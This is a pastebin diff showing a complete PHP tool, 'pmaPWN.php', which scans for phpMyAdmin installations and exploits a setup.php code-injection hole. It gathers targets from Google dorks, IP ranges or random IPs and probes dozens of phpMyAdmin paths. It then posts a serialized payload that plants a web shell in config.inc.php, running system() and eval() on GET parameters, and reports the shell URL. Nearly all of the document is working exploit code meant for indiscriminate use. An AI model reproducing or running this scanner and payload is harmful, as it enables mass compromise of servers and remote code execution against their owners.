View difference between Paste ID: <a href="/Y7hF7wXv">Y7hF7wXv</a> and <a href="/in1n9usy">in1n9usy</a>

<?php
1		<?php
2
3		error_reporting(0);
4		set_time_limit(0);
5		ini_set('memory_limit', '256M');
6		ini_set('display_errors', 0);
7		ini_set('max_execution_time', 0);
8		ini_set('allow_url_fopen', 1);
9		/*
10		* ***************************************************************
11		pmaPWN.php - d3ck4, [email protected]
12		phpMyAdmin Code Injection RCE Scanner & Exploit
13		This is PHP version original http://milw0rm.com/exploits/8921
14		credit: Greg Ose, pagvac @ gnucitizen.org
15		greetz: Hacking Expose!, HM Security, darkc0de
16		* ***************************************************************
17
18		EDITADO POR GoogleINURL
19		blog.inurl.com.br
20		*/
21
22
23		$list = array(
24		'/phpmyadmin/',
25		'/phpMyAdmin/',
26		'/PMA/',
27		'/pma/',
28		'/admin/',
29		'/dbadmin/',
30		'/mysql/',
31		'/myadmin/',
32		'/phpmyadmin2/',
33		'/phpMyAdmin2/',
34		'/phpMyAdmin-2/',
35		'/php-my-admin/',
36		'/phpMyAdmin-2.2.3/',
37		'/phpMyAdmin-2.2.6/',
38		'/phpMyAdmin-2.5.1/',
39		'/phpMyAdmin-2.5.4/',
40		'/phpMyAdmin-2.5.5-rc1/',
41		'/phpMyAdmin-2.5.5-rc2/',
42		'/phpMyAdmin-2.5.5/',
43		'/phpMyAdmin-2.5.5-pl1/',
44		'/phpMyAdmin-2.5.6-rc1/',
45		'/phpMyAdmin-2.5.6-rc2/',
46		'/phpMyAdmin-2.5.6/',
47		'/phpMyAdmin-2.5.7/',
48		'/phpMyAdmin-2.5.7-pl1/',
49		'/phpMyAdmin-2.6.0-alpha/',
50		'/phpMyAdmin-2.6.0-alpha2/',
51		'/phpMyAdmin-2.6.0-beta1/',
52		'/phpMyAdmin-2.6.0-beta2/',
53		'/phpMyAdmin-2.6.0-rc1/',
54		'/phpMyAdmin-2.6.0-rc2/',
55		'/phpMyAdmin-2.6.0-rc3/',
56		'/phpMyAdmin-2.6.0/',
57		'/phpMyAdmin-2.6.0-pl1/',
58		'/phpMyAdmin-2.6.0-pl2/',
59		'/phpMyAdmin-2.6.0-pl3/',
60		'/phpMyAdmin-2.6.1-rc1/',
61		'/phpMyAdmin-2.6.1-rc2/',
62		'/phpMyAdmin-2.6.1/',
63		'/phpMyAdmin-2.6.1-pl1/',
64		'/phpMyAdmin-2.6.1-pl2/',
65		'/phpMyAdmin-2.6.1-pl3/',
66		'/phpMyAdmin-2.6.2-rc1/',
67		'/phpMyAdmin-2.6.2-beta1/',
68		'/phpMyAdmin-2.6.2-rc1/',
69		'/phpMyAdmin-2.6.2/',
70		'/phpMyAdmin-2.6.2-pl1/',
71		'/phpMyAdmin-2.6.3/',
72		'/phpMyAdmin-2.6.3-rc1/',
73		'/phpMyAdmin-2.6.3/',
74		'/phpMyAdmin-2.6.3-pl1/',
75		'/phpMyAdmin-2.6.4-rc1/',
76		'/phpMyAdmin-2.6.4-pl1/',
77		'/phpMyAdmin-2.6.4-pl2/',
78		'/phpMyAdmin-2.6.4-pl3/',
79		'/phpMyAdmin-2.6.4-pl4/',
80		'/phpMyAdmin-2.6.4/',
81		'/phpMyAdmin-2.7.0-beta1/',
82		'/phpMyAdmin-2.7.0-rc1/',
83		'/phpMyAdmin-2.7.0-pl1/',
84		'/phpMyAdmin-2.7.0-pl2/',
85		'/phpMyAdmin-2.7.0/',
86		'/phpMyAdmin-2.8.0-beta1/',
87		'/phpMyAdmin-2.8.0-rc1/',
88		'/phpMyAdmin-2.8.0-rc2/',
89		'/phpMyAdmin-2.8.0/',
90		'/phpMyAdmin-2.8.0.1/',
91		'/phpMyAdmin-2.8.0.2/',
92		'/phpMyAdmin-2.8.0.3/',
93		'/phpMyAdmin-2.8.0.4/',
94		'/phpMyAdmin-2.8.1-rc1/',
95		'/phpMyAdmin-2.8.1/',
96		'/phpMyAdmin-2.8.2/',
97		'/sqlmanager/',
98		'/mysqlmanager/',
99		'/p/m/a/',
100		'/PMA2005/',
101		'/pma2005/',
102		'/phpmanager/',
103		'/php-myadmin/',
104		'/phpmy-admin/',
105		'/webadmin/',
106		'/sqlweb/',
107		'/websql/',
108		'/webdb/',
109		'/mysqladmin/',
110		'/mysql-admin/',
111		);
112
113		function filterHost($array = array()) {
114		if (!empty($array)) {
115		foreach ($array as $value) {
116		$real = parse_url("http://{$value}");
117		$_[] = "http://" . $real['host'];
118		}
119
120		return array_filter(array_unique($_));
121		} else {
122
123		return NULL;
124		}
125		}
126
127		################################################################################
128		#GENERATOR RANGE IP#############################################################
129		################################################################################
130
131		function __generatorRangeIP($range) {
132
133		$ip_ = explode(',', $range);
134		if (is_array($ip_)) {
135
136		$_ = array(0 => ip2long($ip_[0]), 1 => ip2long($ip_[1]));
137		while ($_[0] <= $_[1]) {
138
139		$ips[] = "http://" . long2ip($_[0]);
140		$_[0] ++;
141		}
142		} else {
143
144		return FALSE;
145		}
146
147		return $ips;
148		}
149
150		################################################################################
151		#GENERATOR RANGE IP RANDOM######################################################
152		################################################################################
153
154		function __generatorIPRandom($cont) {
155
156		$cont[0] = 0;
157		while ($cont[0] < $cont[1]) {
158
159		$bloc[0] = rand(0, 255);
160		$bloc[1] = rand(0, 255);
161		$bloc[2] = rand(0, 255);
162		$bloc[3] = rand(0, 255);
163		$ip[] = "http://{$bloc[0]}.{$bloc[1]}.{$bloc[2]}.{$bloc[3]}";
164
165		$cont[0] ++;
166		}
167		return array_unique($ip);
168		}
169
170		$banner = "
171		\t---------------------------------------------------------------
172		\t phpMyAdmin Code Injection RCE Scanner & Exploit
173		\t This is PHP version original http://milw0rm.com/exploits/8921
174		\t Edited by GoogleINURL - http://blog.inurl.com.br
175		\t---------------------------------------------------------------
176		\n";
177
178		if ($argc > 1) {
179		print $banner;
180		print "Usage: php $argv[0] \n";
181		exit;
182		}
183
184		print $banner;
185		print "\n";
186		$Handlex = FOpen("pmaPWN.log", "a+");
187		FWrite($Handlex, $banner);
188
189		print "[-] Master, where you want to go today? \n";
190		print "[-] OPTIONS: \n";
191		print "---------------------------------------------------------------------\n";
192		print "[+] DORKING: [ 1 ]\n";
193		print "[+] RANGE IP: [ 2 ]\n";
194		print "[+] RANGE IP RANDOM: [ 3 ]\n";
195		print "[+] VALUES FILE: [ 4 ]\n";
196		print "---------------------------------------------------------------------\n";
197		fwrite(STDOUT, "\nGoogleINURL@scan:/options# ");
198		$op = trim(fgets(STDIN));
199
200		if ($op == 1) {
201		print "[-] example: intitle:phpMyAdmin\n";
202		fwrite(STDOUT, "GoogleINURL@scan:/options/set_dork# ");
203		$dork = urlencode(trim(fgets(STDIN)));
204		print "\n[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n";
205		FWrite($Handlex, "[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n");
206		//for($i = 0; $i <= 2; $i+=100) {
207		$ch = curl_init();
208		curl_setopt($ch, CURLOPT_URL, "https://www.google.com.br/search?q=$dork&num=1500&btnG=Search&pws=1");
209		curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
210		curl_setopt($ch, CURLOPT_TIMEOUT, 200);
211		curl_setopt($ch, CURLOPT_HEADER, 1);
212		curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
213		curl_setopt($ch, CURLOPT_REFERER, "http://google.com");
214		curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9');
215		$pg = curl_exec($ch);
216		curl_close($ch);
217
218		# MODIFICADO MOTOR DE BUSCA E REG DE VALIDAÇÃO BY GoogleINURL - 26/jun/2015
219		$html = str_replace('href="/url?q=', 'href="', $pg);
220		$html = str_replace('https://www.google.com.br', '', $html);
221		$html = str_replace('http://www.phpmyadmin.net', '', $html);
222
223		preg_match_all("#(<h3 class=\"r\"><a href=\"http[s]?://(.*?)\">)#si", $html, $links);
224		$_ = array_filter(array_unique($links[2]));
225
226		//if (preg_match_all($reg, $html, $links)) { $res[] = $links[2]; }
227		//}
228		$res = filterHost($_);
229		}
230
231		if ($op == 2) {
232		print "\n[-] example: 200.107.69.1,200.107.69.255 \n";
233		fwrite(STDOUT, "GoogleINURL@scan:/options/set_range# ");
234		$value = (trim(fgets(STDIN)));
235		$res = __generatorRangeIP($value);
236		}
237
238		if ($op == 3) {
239		print "\n[-] Amount of IPS / example: 255 \n";
240		fwrite(STDOUT, "GoogleINURL@scan:/options/set_range_rand# ");
241		$value = (trim(fgets(STDIN)));
242		$res = __generatorIPRandom(array([0] => 0, 1 => $value));
243		}
244
245		if ($op == 4) {
246		print "[-] example: hosts.txt ";
247		fwrite(STDOUT, "\nGoogleINURL@scan:/options/set_file# ");
248		$value = (trim(fgets(STDIN)));
249		$res = array_unique(array_filter(explode("\n", file_get_contents($value))));
250		}
251
252
253
254		(!isset($res) && empty($res) ? exit("\n[x] ERRO SEM RESULTADOS\n") : NULL);
255		print "---------------------------------------------------------------------\n";
256		$total = count($res);
257		print "\n[+] Done. $total rows return.\n";
258		FWrite($Handlex, "[+] Done. $total rows return.\n");
259		FClose($Handlex);
260
261		// foreach($res as $key) {
262		$cont = 1;
263		foreach ($res as $url) {
264
265		$Handlex = FOpen("pmaPWN.log", "a+");
266		//$real = parse_url("http://{$target}");
267		//$url = "http://" . $real['host'];
268		print "\n[ {$cont} / {$total} ][-] Scanning phpMyAdmin on " . $url . "\n";
269		$cont++;
270		FWrite($Handlex, "\n[-] Scanning phpMyAdmin on " . $url . "\n");
271		FClose($Handlex);
272		sleep(5);
273		$curlHandle = curl_multi_init();
274		for ($i = 0; $i < count($list); $i++)
275		$curl[$i] = addHandle($curlHandle, $url . $list[$i]);
276		ExecHandle($curlHandle);
277		for ($i = 0; $i < count($list); $i++) {
278		$text[$i] = curl_multi_getcontent($curl[$i]);
279		//echo $url.$list[$i]."\n";
280		$Handlex = FOpen("pmaPWN.log", "a+");
281		if (preg_match("/<title>phpMyAdmin/", $text[$i]) or preg_match("/<title>Access denied/", $text[$i]) and preg_match("/phpMyAdmin/", $text[$i])) {
282		print "\n[!] w00t! w00t! Found phpMyAdmin [ " . $url . $list[$i] . " ]";
283		print "\n[+] Testing vulnerable, wait sec..\n";
284		FWrite($Handlex, "\n[!] w00t! w00t! Found phpMyAdmin [ " . $url . $list[$i] . " ]");
285		FWrite($Handlex, "\n[+] Testing vulnerable, wait sec..\n");
286		if (preg_match("/phpMyAdmin is more friendly with a/", $text[$i])) {
287		print "\n[!] w00t! w00t! NO PASSWD --> [ " . $url . $list[$i] . " ]\n";
288		FWrite($Handlex, "\n[!] w00t! w00t! NO PASSWD --> [ " . $url . $list[$i] . " ]\n");
289		}
290		FClose($Handlex);
291		exploit_site($url . $list[$i]);
292		}
293		}
294		for ($i = 0; $i < count($list); $i++)//remove the handles
295		curl_multi_remove_handle($curlHandle, $curl[$i]);
296		curl_multi_close($curlHandle);
297		sleep(5);
298		}
299
300		// }
301
302		function addHandle(&$curlHandle, $url) {
303		$cURL = curl_init();
304		curl_setopt($cURL, CURLOPT_URL, $url);
305		curl_setopt($cURL, CURLOPT_HEADER, 0);
306		curl_setopt($cURL, CURLOPT_RETURNTRANSFER, 1);
307		curl_setopt($cURL, CURLOPT_TIMEOUT, 10);
308		curl_setopt($cURL, CURLOPT_CONNECTTIMEOUT, 10);
309		curl_multi_add_handle($curlHandle, $cURL);
310		return $cURL;
311		}
312
313		//execute the handle until the flag passed
314		// to function is greater then 0
315		function ExecHandle(&$curlHandle) {
316		$flag = null;
317		do {
318		//fetch pages in parallel
319		curl_multi_exec($curlHandle, $flag);
320		} while ($flag > 0);
321		}
322
323		function exploit_site($url) {
324		$ch = curl_init();
325		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
326		curl_setopt($ch, CURLOPT_HEADER, 1);
327		curl_setopt($ch, CURLOPT_TIMEOUT, 100);
328		curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 20);
329		curl_setopt($ch, CURLOPT_URL, $url . "scripts/setup.php");
330		$result = curl_exec($ch);
331		curl_close($ch);
332		$ch2 = curl_init();
333		curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
334		curl_setopt($ch, CURLOPT_TIMEOUT, 100);
335		curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 20);
336		curl_setopt($ch2, CURLOPT_URL, $url . "config/config.inc.php");
337		$result2 = curl_exec($ch2);
338		curl_close($ch2);
339		//print $url;
340		if (preg_match("/200 OK/", $result) and preg_match("/token/", $result) and preg_match("/200 OK/", $result2)) {
341		print "\n[!] w00t! w00t! Found possible phpMyAdmin vuln";
342		print "\n[+] Exploiting, wait sec..\n";
343		$Handlex = FOpen("pmaPWN.log", "a+");
344		FWrite($Handlex, "\n[!] w00t! w00t! Found possible phpMyAdmin vuln");
345		FWrite($Handlex, "\n[+] Exploiting, wait sec..\n");
346		FClose($Handlex);
347		exploit($url);
348		} else {
349		$Handlex = FOpen("pmaPWN.log", "a+");
350		print "\n[-] Shit! no luck.. not vulnerable\n";
351		FWrite($Handlex, "\n[-] Shit! no luck.. not vulnerable\n");
352		FClose($Handlex);
353		}
354		}
355
356		function exploit($w00t) {
357		$Handlex = FOpen("pmaPWN.log", "a+");
358		$useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729) "; //firefox
359		//first get cookie + token
360		$curl = curl_init();
361		curl_setopt($curl, CURLOPT_URL, $w00t . "scripts/setup.php"); //URL
362		curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
363		curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
364		curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
365		curl_setopt($curl, CURLOPT_TIMEOUT, 100);
366		curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
367		curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
368		curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
369		curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); //return site as string
370		curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
371		curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
372		$result = curl_exec($curl);
373		curl_close($curl);
374		if (preg_match_all("/token\"\s+value=\"([^>]+?)\"/", $result, $matches))
375		;
376
377		$token = $matches[1][1];
378		if ($token != '') {
379		print "\n[!] w00t! w00t! Got token = " . $matches[1][1];
380		FWrite($Handlex, "\n[!] w00t! w00t! Got token = " . $matches[1][1]);
381		$payload = "token=" . $token . "&action=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d=%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3bsystem(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix";
382		print "\n[+] Sending evil payload mwahaha.. \n";
383		FWrite($Handlex, "\n[+] Sending evil payload mwahaha.. \n");
384		$curl = curl_init();
385		curl_setopt($curl, CURLOPT_URL, $w00t . "scripts/setup.php");
386		curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
387		curl_setopt($curl, CURLOPT_TIMEOUT, 200);
388		curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
389		curl_setopt($curl, CURLOPT_REFERER, $w00t);
390		curl_setopt($curl, CURLOPT_POST, true);
391		curl_setopt($curl, CURLOPT_POSTFIELDS, $payload);
392		curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
393		curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
394		curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3);
395		curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
396		curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
397		curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
398		$result = curl_exec($curl);
399		curl_close($curl);
400
401		print "\n[!] w00t! w00t! You should now have shell here";
402		print "\n[+] " . $w00t . "config/config.inc.php?c=id \n";
403		print "\n[!] Saved. Dont forget to check `pmaPWN.log`\n";
404		FWrite($Handlex, "\n[!] w00t! w00t! You should now have shell here");
405		FWrite($Handlex, "\n[+] " . $w00t . "config/config.inc.php?c=id \n");
406		} else {
407		print "\n[!] Shit! no luck.. not vulnerable\n";
408		FWrite($Handlex, "\n[!] Shit! no luck.. not vulnerable\n");
409		return false;
410		}
411		FClose($Handlex);
412		if (file_exists('exploitcookie.txt')) {
413		unlink('exploitcookie.txt');
414		}
415		//exit();
416		}